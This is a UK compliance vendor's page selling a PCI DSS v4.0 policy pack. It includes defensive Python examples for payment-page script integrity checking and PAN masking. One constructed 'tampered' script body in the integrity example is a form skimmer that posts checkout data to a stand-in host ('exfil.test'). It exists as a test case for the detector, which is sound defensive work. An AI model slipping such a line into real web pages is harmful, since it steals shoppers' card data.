PCI DSS v4.0 Policies for UK Retailers & SaaS

12 policies mapped to all 12 PCI DSS v4.0 requirement families. Written for UK retailers and e-commerce SMEs — ready for SAQ submission or QSA audit.


PCI DSS Retail Starter Pack

12 policies · £400 one-off

Lifetime access · no renewal · v4.0-ready


What is PCI DSS?

Quick answer. PCI DSS is the contractually binding security standard for organisations that store, process or transmit cardholder data, maintained by the PCI Security Standards Council (founded by Visa, Mastercard, Amex, Discover and JCB). The current version is PCI DSS v4.0.1 (published June 2024 and the only active version since 1 January 2025), with 12 requirements covering network security, access control, encryption, testing and policy. It is enforced via the merchant's acquiring bank, not by a government regulator.

PCI DSS (Payment Card Industry Data Security Standard) is the contractual standard governing every business that stores, processes or transmits cardholder data. It is enforced by the card schemes (Visa, Mastercard, Amex, Discover, JCB) via acquiring banks — not by a government regulator — but the penalties for non-compliance include fines, increased transaction fees, and loss of card-acceptance privileges.

The current version is PCI DSS v4.0.1 (published June 2024; v4.0 itself was retired on 31 December 2024), with all future-dated requirements mandatory from 31 March 2025. Key v4.0 additions include targeted risk analyses (Req 12.3.1), authenticated internal vulnerability scans (Req 11.3.1.2), MFA for all access into the cardholder data environment (Req 8.4.2) using replay-resistant implementations (Req 8.5.1), anti-phishing mechanisms (Req 5.4.1), and an authorised inventory plus change-and-tamper detection for scripts on e-commerce payment pages (Req 6.4.3 and 11.6.1).
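The payment-page script requirement above is the one most e-commerce teams have not met before. The following is an added example, not code from this page or from any vendor or payment provider, showing the core of a Req 6.4.3 control: an authorised inventory of scripts with a business justification and an approval-time hash, checked against what a checkout page currently references and serves. The URLs, script bodies and checkout HTML are constructed for the demo; the hash format is the standard Subresource Integrity string, so the same value can also be put in the script tag's integrity attribute for browser-side enforcement.

```python
"""Payment-page script inventory and integrity check.

Added example illustrating PCI DSS v4.0 Req 6.4.3 (inventory of payment-page
scripts with written justification and integrity assurance). It is not code
from the page or from any vendor; the script URLs, bodies and page HTML below
are constructed for the demo.
"""
import base64
import hashlib
import re


def sri_hash(body: bytes, alg: str = "sha384") -> str:
    """Subresource Integrity value ('sha384-<base64 digest>') for a script body.

    The same string can be placed in <script integrity="..."> so the browser
    refuses to execute a modified copy of the script.
    """
    digest = hashlib.new(alg, body).digest()
    return f"{alg}-{base64.b64encode(digest).decode('ascii')}"


# Script bodies as they were when the change was approved (constructed).
APPROVED_BODIES = {
    "https://js.example-psp.test/v3/checkout.js": b"/* checkout.js v3 */ window.PSP = {};",
    "https://cdn.example-shop.test/app.js": b"window.app = {};",
}

# The authorised inventory: every script permitted on the payment page, its
# business justification, and the hash recorded at approval time.
INVENTORY = {
    "https://js.example-psp.test/v3/checkout.js": {
        "justification": "Payment provider hosted-field loader",
        "sri": sri_hash(APPROVED_BODIES["https://js.example-psp.test/v3/checkout.js"]),
    },
    "https://cdn.example-shop.test/app.js": {
        "justification": "Shop front-end bundle",
        "sri": sri_hash(APPROVED_BODIES["https://cdn.example-shop.test/app.js"]),
    },
}

SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\ssrc="([^"]+)"', re.IGNORECASE)


def audit_page(html: str, served: dict) -> dict:
    """Classify each external script referenced by `html` against INVENTORY.

    `served` maps script URL -> body currently being delivered (constructed
    here; in production it would come from a fetch or a browser-side monitor).
    Returns {'ok': [...], 'unauthorised': [...], 'tampered': [...]}.
    """
    result = {"ok": [], "unauthorised": [], "tampered": []}
    for url in SCRIPT_SRC_RE.findall(html):
        entry = INVENTORY.get(url)
        if entry is None:
            # Not in the inventory at all: the classic digital-skimmer pattern.
            result["unauthorised"].append(url)
        elif sri_hash(served.get(url, b"")) != entry["sri"]:
            # Known script whose body no longer matches the approved hash.
            result["tampered"].append(url)
        else:
            result["ok"].append(url)
    return result


# Constructed checkout page and the bodies a monitor observed being served.
CHECKOUT_HTML = """
<script src="https://js.example-psp.test/v3/checkout.js"></script>
<script src="https://cdn.example-shop.test/app.js"></script>
<script src="https://static.unknown-cdn.test/analytics.js"></script>
"""
SERVED_NOW = {
    "https://js.example-psp.test/v3/checkout.js": APPROVED_BODIES["https://js.example-psp.test/v3/checkout.js"],
    # app.js has gained a line that posts the checkout form somewhere else.
    "https://cdn.example-shop.test/app.js": b"window.app = {}; fetch('https://exfil.test', {method: 'POST', body: new FormData(document.forms[0])});",
    "https://static.unknown-cdn.test/analytics.js": b"/* never approved */",
}

if __name__ == "__main__":
    for status, urls in audit_page(CHECKOUT_HTML, SERVED_NOW).items():
        print(f"{status:12s} {urls}")
```

Run on the constructed page, the check reports checkout.js as ok, app.js as tampered and analytics.js as unauthorised. A production version would fetch the bodies on a schedule (or receive them from a browser-side monitor), alert on anything outside "ok", and keep the inventory under the same change control as the rest of the payment page.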

Who needs PCI DSS?

Quick answer. Any UK firm that stores, processes or transmits cardholder data — e-commerce merchants, payment service providers, SaaS firms with credit-card-on-file, and card-not-present BPOs. Merchant level depends on annual transaction volume (Level 1: 6m+, Level 2: 1m–6m, Level 3: 20k–1m e-commerce, Level 4: under 20k e-commerce or under 1m in total). Even Level 4 SAQ-eligible merchants need the supporting policy set; Level 1 merchants add an annual QSA-led Report on Compliance.

  • UK e-commerce retailers — every Shopify, WooCommerce, or custom-built store accepting card payments.
  • UK SaaS firms that take card payments — either directly or via Stripe/Adyen/GoCardless.
  • Subscription businesses and marketplaces processing recurring payments.
  • Hospitality, ticketing, and events firms handling card-present transactions.
  • Service providers and payment processors — additional "service providers only" requirements, most of them in Requirement 12 (e.g. 12.4 executive responsibility and 12.9 written acknowledgements to customers).

Policies you need for PCI DSS

Quick answer. PCI DSS v4.0.1 Requirement 12 prescribes a documented information-security policy (Req 12.1) plus 11 supporting policies: acceptable use (Req 12.2), risk assessment and targeted risk analysis (Req 12.3), service-provider management (Req 12.8), incident response (Req 12.10), security awareness (Req 12.6), encryption / key management (Req 3, 4), access control (Req 7, 8), change management (Req 6), vulnerability management (Req 6, 11), wireless and remote access (Req 1, 2, 8), and physical security (Req 9).

Each of the 12 PCI DSS requirement families needs documented policies and procedures. Our PCI DSS Retail Starter Pack delivers all 12, bespoke to your merchant scope:

Information Security Policy

Req 12 — overarching ISMS owned by leadership.

Network Security

Req 1 — firewalls, segmentation, network diagrams.

Vulnerability Management

Req 6 & 11 — patching, scans, penetration tests.

Access Control

Req 7 & 8 — need-to-know, MFA, session timeouts.

Monitoring and Logging

Req 10 — audit logging, log retention, review cadence.

Security Testing

Req 11 — ASV scans, pen testing, payment-page change-and-tamper detection (Req 11.6.1, new in v4.0).

Vendor Management

Req 12.8/12.9 — TPSP list, AoC tracking, responsibility matrix.

Incident Response

Req 12.10 — CDE breach handling, card-brand notification.

Physical Security

Req 9 — device controls, visitor logs, media handling.

Data Classification

Req 3 — PAN storage rules, masking, truncation.

Encryption

Req 3 & 4 — key management, TLS standards, in-transit encryption.

Change Control

Req 6 — change approvals, separation of environments.
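The Data Classification and Encryption policies above describe PAN handling in words; the following is an added example, not code from this page or from any vendor, of the corresponding technical controls: masking for display (Req 3.4.1, at most BIN plus last four visible), truncation for storage where the full PAN is not needed (Req 3.5.1), and a log scrubber that finds Luhn-valid PANs in application log lines and redacts sensitive authentication data fields so they are never retained after authorisation (Req 3.3.1). The card numbers are well-known test numbers and the log lines are constructed; the field names `cvv`, `cvc` and `cid` in the regex are assumptions about how a log might label those values.

```python
"""PAN masking, truncation and log scrubbing.

Added example illustrating PCI DSS v4.0 Req 3.4.1 (PAN masked when displayed,
BIN plus last four at most), Req 3.5.1 (PAN unreadable wherever stored, for
example by truncation) and Req 3.3.1 (no sensitive authentication data kept
after authorisation). Not code from the page or any vendor. The card numbers
below are well-known test numbers, not issued accounts, and the log lines are
constructed.
"""
import re


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit validation; separates PANs from other long numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                       # every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str, bin_digits: int = 6) -> str:
    """Display form: BIN prefix and last four visible, everything else masked.

    Req 3.4.1 caps what may be shown at the BIN and the last four digits;
    six-digit BINs are the common case, eight is the ceiling for 8-digit BINs.
    """
    digits = re.sub(r"\D", "", pan)
    if not 13 <= len(digits) <= 19:
        raise ValueError("not a PAN length")
    if not 0 <= bin_digits <= 8:
        raise ValueError("BIN display limited to 8 digits")
    return digits[:bin_digits] + "*" * (len(digits) - bin_digits - 4) + digits[-4:]


def truncate_pan(pan: str) -> str:
    """Storage form when the full PAN is not needed: keep only the last four.

    Truncation is one of the Req 3.5.1 methods; it is irreversible, so the
    full PAN must not be retained anywhere alongside the truncated value.
    """
    digits = re.sub(r"\D", "", pan)
    return digits[-4:]


# Runs of 13-19 digits, optionally separated by single spaces or hyphens,
# not embedded inside a longer digit run.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
# Sensitive authentication data fields that must never be logged (Req 3.3.1);
# the field names are an assumption about how an application labels them.
SAD_FIELD = re.compile(r"\b(cvv2?|cvc2?|cid)=\d{3,4}", re.IGNORECASE)


def scrub_log_line(line: str) -> tuple:
    """Mask every Luhn-valid PAN in a log line and redact SAD fields.

    Returns (scrubbed_line, number_of_pans_masked). Order numbers and other
    long digit strings that fail Luhn are left alone; a Luhn-valid non-PAN is
    a false positive this detector accepts rather than risk leaking a PAN.
    """
    masked = 0

    def repl(m):
        nonlocal masked
        digits = re.sub(r"\D", "", m.group(0))
        if luhn_ok(digits):
            masked += 1
            return mask_pan(digits)
        return m.group(0)

    line = PAN_CANDIDATE.sub(repl, line)
    line = SAD_FIELD.sub(lambda m: f"{m.group(1)}=[REDACTED]", line)
    return line, masked


def scrub_log(lines):
    """Scrub a sequence of log lines; returns (scrubbed_lines, total_pans_masked)."""
    out, total = [], 0
    for line in lines:
        clean, n = scrub_log_line(line)
        out.append(clean)
        total += n
    return out, total


# Constructed log lines: an order number that happens to be 13 digits long,
# a Visa test PAN with spaces plus a CVV, and a Mastercard test PAN with a CVC.
SAMPLE_LOG = [
    "2025-03-31T10:15:02Z order=1234567890123 status=paid amount=49.99",
    "2025-03-31T10:15:02Z DEBUG card=4111 1111 1111 1111 exp=12/27 cvv=123",
    "2025-03-31T10:16:44Z DEBUG pan=5555555555554444 cvc=999 order=1234567890124",
]

if __name__ == "__main__":
    for line in scrub_log(SAMPLE_LOG)[0]:
        print(line)
```

On the constructed lines the scrubber leaves the 13-digit order numbers untouched (they fail Luhn), masks both test PANs to BIN plus last four, and replaces the CVV/CVC values. Scrubbing logs after the fact is a safety net; the primary control is never passing the full PAN or SAD to a logger in the first place, and the scrubber's counter is useful precisely because a non-zero value means a code path is still doing so.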

Realistic timeline to PCI DSS compliance

Quick answer. 3–6 months for a UK e-commerce merchant or SaaS firm to reach PCI DSS v4.0.1 readiness. Month 1: scope reduction (tokenisation, hosted payment page) is the highest-leverage move. PolicySuite generates the 12-policy set in 48 hours. Months 2–3: technical controls (segmentation, encryption, logging). Month 4: ASV scans, internal vulnerability testing. Months 5–6: SAQ submission (Levels 2–4) or QSA-led Report on Compliance (Level 1).

For most UK SMEs on SAQ A or A-EP, 4–8 weeks from day zero to submitted AoC. SAQ D or Level 1 QSA assessments take 3–6 months.

  1. Week 1: Scope assessment — map card data flows, identify your SAQ type, pick an ASV. Buy the pack and receive 12 bespoke policies in 48 hours.
  2. Week 2–3: Fix common gaps — enforce MFA everywhere, enable logging, document network diagram, implement v4.0 script monitoring.
  3. Week 4: First quarterly ASV scan, remediate findings.
  4. Week 5–7: Complete the SAQ, collect evidence, sign AoC.
  5. Week 8: Submit to acquirer. Set calendar for quarterly ASV + annual renewal.

PolicySuite vs GRC platforms vs consultant vs DIY

Quick answer. PCI QSAs charge £15k–£80k for a Level 1 readiness engagement; smaller SAQ engagements run £3k–£10k. GRC platforms (Vanta, Drata) added PCI DSS mappings recently but at £15k–£50k/year. DIY templates often miss the v4.0.1 changes (targeted risk analyses, the customised approach as an alternative to the defined approach, payment-page script controls). PolicySuite generates v4.0.1-mapped PCI policies in 48 hours from £400.

UK SMEs typically compare four routes when sourcing compliance policies. Here's how they stack up on the decisions that matter.

| | PolicySuite | GRC platforms (Vanta, Drata, SecureFrame) | Compliance consultant | DIY templates |
|---|---|---|---|---|
| Typical cost | £250–£1,500 one-off | £10k–£40k per year | £5k–£30k one-off | £0 + your time |
| Pricing model | Lifetime purchase | Annual seat-based | Project fee | Free (indefinite effort) |
| Time to policies ready | 48 hours | 4–8 weeks setup | 8–16 weeks | Months — rarely finished |
| UK-specific content | Built for UK SMEs | Partial — US-originated | If UK consultant | Partial — boilerplate templates only |
| Bespoke to your business | LLM-tailored from your answers | Partial — fill-in-the-blank | Yes — manual | Generic template |
| Framework coverage | 197 frameworks · 8 jurisdictions | 20–50 frameworks | Whatever the consultant knows | Up to you to find |
| Audit-ready evidence | Acknowledgements, distributions, version history | Strong — but seat-priced | You track it yourself | You track it yourself |
| Suits <50-person SMEs | Designed for UK SMEs | Price-prohibitive at SME scale | Sometimes — depends on scope | If you have the time |
| Cost to switch away | You own the docs — export anytime | Lose access on cancellation | You own the docs | You own the docs |


Frequently asked questions

Which PCI DSS version should I comply with?

PCI DSS v4.0.1 is the current version; v3.2.1 was retired on 31 March 2024 and v4.0 on 31 December 2024. All future-dated v4.0 requirements became mandatory on 31 March 2025 — targeted risk analyses, authenticated internal scans, MFA for all access into the cardholder data environment (replay-resistant, per Req 8.5.1), anti-phishing mechanisms, and payment-page script inventory and tamper detection. Our pack uses v4.0.1 language.

Do I need a QSA audit or can I self-assess?

Level 1 merchants (over 6 million transactions/year, or any merchant post-breach) need an annual QSA-led Report on Compliance. Levels 2–4 usually self-assess via the appropriate SAQ (A, A-EP, B, C, D). Most UK SMEs are Level 4 — SAQ plus quarterly ASV scan is sufficient.

Does outsourcing payments to Stripe make me compliant?

Using Stripe Checkout (a redirect) or a hosted iframe reduces scope to SAQ A — the lightest version — but you still need documented policies, access controls, a data-flow map, vendor management over Stripe, and control over the scripts on any page that embeds or redirects to the payment form. Note that the January 2025 revision of SAQ A makes this an eligibility condition: you must confirm your site is not susceptible to script attacks that could affect the payment page, which in practice means knowing and controlling what runs on it. Our pack covers SAQ A, A-EP and D scenarios.

How much does PCI DSS cost for a UK SME?

SAQ A/A-EP: £300–£1,500/year for ASV scanning plus internal time. SAQ D: £3,000–£10,000 of consultant help if scope is complex. Level 1 QSA assessment: £15,000–£40,000. PolicySuite replaces the policy-drafting element with a one-off £400 pack.

What policies do I need for PCI DSS v4.0?

PCI DSS has 12 high-level requirements, each requiring documented policies and procedures. Our pack covers all 12 — information security, network security, vulnerability management, access control, logging, testing, vendor management, incident response, physical security, data classification, encryption, and change control.

What does the PCI DSS Retail Starter Pack include?

12 PCI DSS v4.0-aligned policies covering all 12 requirement families, written for UK retailers and e-commerce SMEs on Shopify, WooCommerce, Stripe Checkout and similar. Covers SAQ A and A-EP scoping explicitly — see live pricing.

Skip the PCI DSS paperwork

Get 12 bespoke PCI v4.0 policies ready in 48 hours — lifetime access.

Get Started — £400

References and primary sources

Quick answer. The framework guidance on this page is reviewed against the primary-source documents below. Each link resolves to an official regulator or standards-body publication so an auditor, procurement reviewer or DPO can verify the alignment without taking the page on trust.

In our experience working with UK SMEs and similar organisations across the EU and US, the framework pages that survive enterprise vendor reviews are the ones that cite primary sources rather than secondary blog posts. Many UK SMEs discover this only after their first failed vendor questionnaire: the reviewer asked for a clause-to-source map and the standard reply pointed at a marketing page rather than the relevant regulator. These references are the standing set we cite from inside the policies themselves so the chain stays intact end-to-end.